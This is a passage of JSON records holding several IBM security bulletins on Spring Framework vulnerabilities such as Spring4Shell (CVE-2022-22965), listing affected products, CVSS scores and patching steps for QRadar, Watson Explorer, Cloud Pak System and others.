vulnerable a product must meet all of the following criterias: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Cloud connector service if enabled will use only the spring, as in a client to make only the REST calls with IBM Cloud Mangement Console. The fix includes Spring 5.3.18. IBM Case Manager doesn't meet all of the criterias and, therefore, is not vulnerable.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Case Manager| 5.3CD \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the affected versions by applying the appropriate interim fix or upgrading.**\n\nAffected Product(s)| Version(s)| Remediation / Fix \n---|---|--- \nIBM Case Manager| V5.3.0 - V5.3.3| Apply IBM Case Manager interim fix for [DT143005](<https://www.ibm.com/mysupport/aCI3p000000Xio5> \"DT143005\" ) or upgrade to IBM Business Automation Workflow 22.0.1 or later. \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T00:45:52", "type": "ibm", "title": "Security Bulletin: IBM Case Manager is affected but not classified as vulnerable to a remote code execution in Spring Framework [CVE-2022-22965]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-10-01T00:45:52", "id": "B547E4473646186969A14DFF0C2EB7D3D14D2E03EBA009074D6083D7482CB50F", "href": "https://www.ibm.com/support/pages/node/6825845", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:54", "description": "## Summary\n\nIBM Sterling Connect:Direct for UNIX is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. The fix includes Spring 2.6.6.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Connect:Direct for UNIX| 6.2.0.0 - 6.2.0.3.iFix010 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Product(s)**| **Version(s) \n**| **Remediation/Fix/Instructions** \n---|---|--- \nIBM Sterling Connect:Direct for UNIX| 6.2.0.0 - 6.2.0.3.iFix010| Apply 6.2.0.3.iFix013, available on [Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Connect%3ADirect+for+UNIX&release=6.2.0.3&platform=All&function=fixId&fixids=6.2.0.3*iFix013*&includeSupersedes=0> \"Fix Central\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-24T17:28:25", "type": "ibm", "title": "Security Bulletin: IBM Sterling Connect:Direct for UNIX is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-24T17:28:25", "id": "D5953B5AA5D620CA09590EAFE9008DB4A5BD219E8F43809D51B746D7643FA0F7", "href": "https://www.ibm.com/support/pages/node/6589575", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:22:15", "description": "## Summary\n\nCMIS is affected since it uses SpringFramework, but not vulnerable to [CVE-2022-22965] and [CVE-2022-22963].\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM ECM CMIS and FileNet Collaboration Services| 3.0.6 \nCP4BA| 21.0.3 \nCP4BA| 22.0.1 \n \n\n\n## Remediation/Fixes\n\nCMIS has upgraded to SpringFramework version 5.3.18 in the below releases. \n \n\n\nProduct| VRMF| Remediation/First Fix \n---|---|--- \nIBM ECM CMIS and FileNet Collaboration Services| 3.0.6.0| [CMIS 3.0.6-IF2](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Other+software/Content+Navigator&release=3.0.6&platform=All&function=all> \"CMIS 3.0.6-IF2\" ) \\- 8/2/2022 \nCP4BA| 21.0.3.0| [CP4BA 21.0.3-IF12](<https://www.ibm.com/support/pages/node/6612563> \"CP4BA 21.0.3-IF12\" ) \\- 9/1/2022 \nCP4BA| 22.0.1.0| [CP4BA 22.0.1-IF2](<https://www.ibm.com/support/pages/node/6612561> \"CP4BA 22.0.1-IF2\" ) \\- 9/2/2022 \n \n \n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-18T15:36:16", "type": "ibm", "title": "Security Bulletin: CMIS is affected since it uses Spring Framework, but not vulnerable to [CVE-2022-22965] and [CVE-2022-22963]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-10-18T15:36:16", "id": "5303EB56B374789D2F25DD42CDE200B10A36458869D3BC5FB7882728637FFBF5", "href": "https://www.ibm.com/support/pages/node/6830265", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:28:58", "description": "## Summary\n\nIBM Cloud Pak System is affected by a remote code execution in Spring Framework (CVE-2022-22965 and CVE-2020-5421). IBM Cloud Pak System ships with AWS component that includes it but is not used by it. The fix removes Spring from the product. This security bulletin service applies to IBM Cloud Pak System, BM Cloud Pak System Software and BM Cloud Pak System Software Suite.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-5421](<https://vulners.com/cve/CVE-2020-5421>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote attacker to bypass security restrictions, caused by improper input validation. By using a specially-crafted jsessionid path parameter, an attacker could exploit this vulnerability to bypass RFD Protection. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/188530](<https://exchange.xforce.ibmcloud.com/vulnerabilities/188530>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Pak System | 2.3.0.1, 2.3.1.1, 2.3.2.0 \nIBM Cloud Pak System | \n\n2.3.3.0, 2.3.3.1, 2.3.3.2, 2.3.3.3, 2.3.3.3 Interim Fix1 \n \n \n\n\n## Remediation/Fixes\n\nFor unsupported version/release/platform IBM recommends upgrading to a fixed, supported version of the product. \n\nIn response to the above vulnerabilities Cloud Pask System removed the related Spring classes with IBM Cloud Pak System v2.3.3.4. Customers are recommended to take action and upgrade as soon as possible. \n\nFor IBM Cloud Pak System v2.3.0.1 through V2.3.3.3 Interim Fix 1 upgrade to IBM Cloud Pak System V2.3.3.4 for Intel at [Fix Central.](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=PureSystems&product=ibm/WebSphere/IBM+Cloud+Pak+System&release=2.3.3.3&platform=All&function=all>)\n\nInformation on upgrading at: <http://www.ibm.com/support/docview.wss?uid=ibm10887959>\n\nFor IBM Tivoli Monitoring pType review the corresponding product security bulletin at <https://www.ibm.com/support/pages/node/6587154>.\n\n## Workarounds and Mitigations\n\nRecommended action is to remove Spring classes manually. Contact IBM Cloud Pak System Support for details.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-08T08:28:51", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Spring Framework affect IBM Cloud Pak System (CVE-2022-22965, CVE-2020-5421)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5421", "CVE-2022-22965"], "modified": "2022-08-08T08:28:51", "id": "23258712AF0C6FF3D199FB0C84691351D550E3A4E86DEF3F1A107BF53AC16647", "href": "https://www.ibm.com/support/pages/node/6610851", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:31:25", "description": "## Summary\n\nIBM QRadar SIEM is affected but not vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. QVM utilizes the Spring Framework to support our Java backed user interface.. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>) \n** DESCRIPTION: **VMware Spring Cloud Function could allow a remote attacker to execute arbitrary code on the system, caused by an error when using the routing functionality. By providing a specially crafted SpEL as a routing-expression, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223020](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223020>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nQRadar / QRM / QVM / QRIF / QNI v7.3| 7.3.0 - 7.3.3 Fix Pack 11 \nQRadar / QRM / QVM / QRIF / QNI v7.4| 7.4.0 - 7.4.3 Fix Pack 5 \nQRadar / QRM / QVM / QRIF / QNI v7.5| 7.5.0 - 7.5.0 Update Package 1 \n \n \n\n\n## Remediation/Fixes\n\nIBM encourages customers to update their systems promptly. \n\n**Product**| **Versions**| **Fix** \n---|---|--- \nQRadar / QRM / QVM / QRIF / QNI| 7.3| [7.3.3 Fix Pack 11 Interim Fix 01](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20220517151911INT&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.3.3 Fix Pack 11 Interim Fix 01\" ) \nQRadar / QRM / QVM / QRIF / QNI| 7.4| [7.4.3 Fix Pack 6](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.4.3-QRADAR-QRSIEM-20220531120920&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.4.3 Fix Pack 6\" ) \nQRadar / QRM / QVM / QRIF / QNI| 7.5| [7.5.0 Update Package 2](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.5.0-QRADAR-QRSIEM-20220527130137&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.5.0 Update Package 2\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-24T17:34:09", "type": "ibm", "title": "Security Bulletin: IBM QRadar SIEM is affected by a remote code execution in Spring Framework (CVE-2022-22963, CVE-2022-22965, CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-06-24T17:34:09", "id": "C0904FD149C70D8A2835DB923B2BF04803388EF83CB969D07F28836C567C672B", "href": "https://www.ibm.com/support/pages/node/6598419", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:34:46", "description": "## Summary\n\nSecurity vulnerability in Spring Framework affects IBM Watson Explorer. IBM Watson Explorer has addressed this vulnerability.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-22060](<https://vulners.com/cve/CVE-2021-22060>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote authenticated attacker to bypass security restrictions, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to insert additional log entries. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Explorer Deep Analytics Edition Foundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.9 \n \nIBM Watson Explorer Deep Analytics Edition Analytical Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.9 \n \nIBM Watson Explorer Foundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - 11.0.2.13 \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - 11.0.2.13 \n \n## Remediation/Fixes\n\n**Affected Product**| **Affected Versions**| **How to acquire and apply the fix** \n---|---|--- \nIBM Watson Explorer Deep Analytics Edition \nFoundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.9\n\n| \n\nQuery Modifier service is affected by this vulnerability. If Query Modifier service is installed (see [Installing Query Modifier](<https://www.ibm.com/docs/en/watson-explorer/12.0.x?topic=explorer-installing-query-modifier>)), please follow the steps below.\n\n 1. If you have not already installed, install V12.0.3.9 (see the Fix Pack [download document](<https://www.ibm.com/support/pages/node/6539806>)).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=12.0.3.9&platform=All&function=all>): **12.0.3.9-WS-WatsonExplorer-DAEFoundational-IF001**.\n 3. To apply the fix, follow the steps below. \n\n 1. Stop Query Modifier service if it is running \n\n * Linux: Run /etc/init.d/querymodifier stop\n * Windows: Open the Service window, choose the Query Modifier Service, and click the Stop Service button.\n 2. Navigate to <install_dir>/Engine/nlq\n 3. Rename querymodifier.jar to querymodifier.jar.bak\n 4. Copy the downloaded querymodifier.jar to <install_dir>/Engine/nlq\n 5. Run install command \n\n * Linux: querymodifier-install.sh\n * Windows: querymodifier-install.ps1\n 6. Start Query Modifier service if you use the service \n\n * Linux: Run /etc/init.d/querymodifier start\n * Windows: Open the Service window, choose the Query Modifier Service, and click the Start Service button. \nIBM Watson Explorer Deep Analytics Edition Analytical Components| 12.0.0.0, 12.0.1, 12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.9| \n\nNatural Language Query service is affected by this vulnerability. Please follow the steps below.\n\n 1. If you have not already installed, install V12.0.3.9 (see the Fix Pack [download document](<https://www.ibm.com/support/pages/node/6539808>)).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=12.0.3.9&platform=All&function=all>): **12.0.3.9-WS-WatsonExplorer-DAEAnalytical-IF001**.\n 3. To apply the fix, follow the steps below. \n\n 1. Stop all services if it is running \nesadmin stop\n 2. Navigate to <install_dir>/lib\n 3. Rename querymodifier.jar and es.indexservice.jar to querymodifier.jar.bak and es.indexservice.jar.bak\n 4. Copy the downloaded querymodifier.jar and es.indexservice.jar to <install_dir>/lib\n 5. Start all services \nesadmin start \nIBM Watson Explorer \nFoundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.13| \n\nQuery Modifier service is affected by this vulnerability. If Query Modifier service is installed (see [Installing Query Modifier](<https://www.ibm.com/docs/en/watson-explorer/11.0.2?topic=explorer-installing-query-modifier>)), please follow the steps below.\n\n 1. If you have not already installed, install V11.0.2.13 (see the Fix Pack [download document](<https://www.ibm.com/support/pages/node/6539814>)).\n 2. Download the interim fix for your edition (Enterprise or Advanced) from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.2.11&platform=All&function=all>): **11.0.2.13-WS-WatsonExplorer-<Edition>Foundational-IF001 **(EE for Enterprise Edition, AE for Advanced Edition).\n 3. To apply the fix, follow the steps below. \n\n 1. Stop Query Modifier service if it is running \n\n * Linux: Run /etc/init.d/querymodifier stop\n * Windows: Open the Service window, choose the Query Modifier Service, and click the Stop Service button.\n 2. Navigate to <install_dir>/Engine/nlq\n 3. Rename querymodifier.jar to querymodifier.jar.bak\n 4. Copy the downloaded querymodifier.jar to <install_dir>/Engine/nlq\n 5. Run install command \n\n * Linux: querymodifier-install.sh\n * Windows: querymodifier-install.ps1\n 6. Start Query Modifier service if you use the service \n\n * Linux: Run /etc/init.d/querymodifier start\n * Windows: Open the Service window, choose the Query Modifier Service, and click the Start Service button. \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.13| \n\nNatural Language Query service is affected by this vulnerability. Please follow the steps below.\n\n 1. If you have not already installed, install V11.0.2.13 (see the Fix Pack [download document](<http://www.ibm.com/support/pages/node/6497905>)).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.2.13&platform=All&function=all>): **11.0.2.13-WS-WatsonExplorer-AEAnalytical-IF001**.\n 3. To apply the fix, follow the steps below. \n\n 1. Stop all services if it is running \nesadmin stop\n 2. Navigate to <install_dir>/lib\n 3. Rename querymodifier.jar and es.indexservice.jar to querymodifier.jar.bak and es.indexservice.jar.bak\n 4. Copy the downloaded querymodifier.jar and es.indexservice.jar to <install_dir>/lib\n 5. Start all services \nesadmin start \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-22T11:43:07", "type": "ibm", "title": "Security Bulletin: Vulnerability exists for Spring Framework in Watson Explorer (CVE-2021-22060, CVE-2022-22965, CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 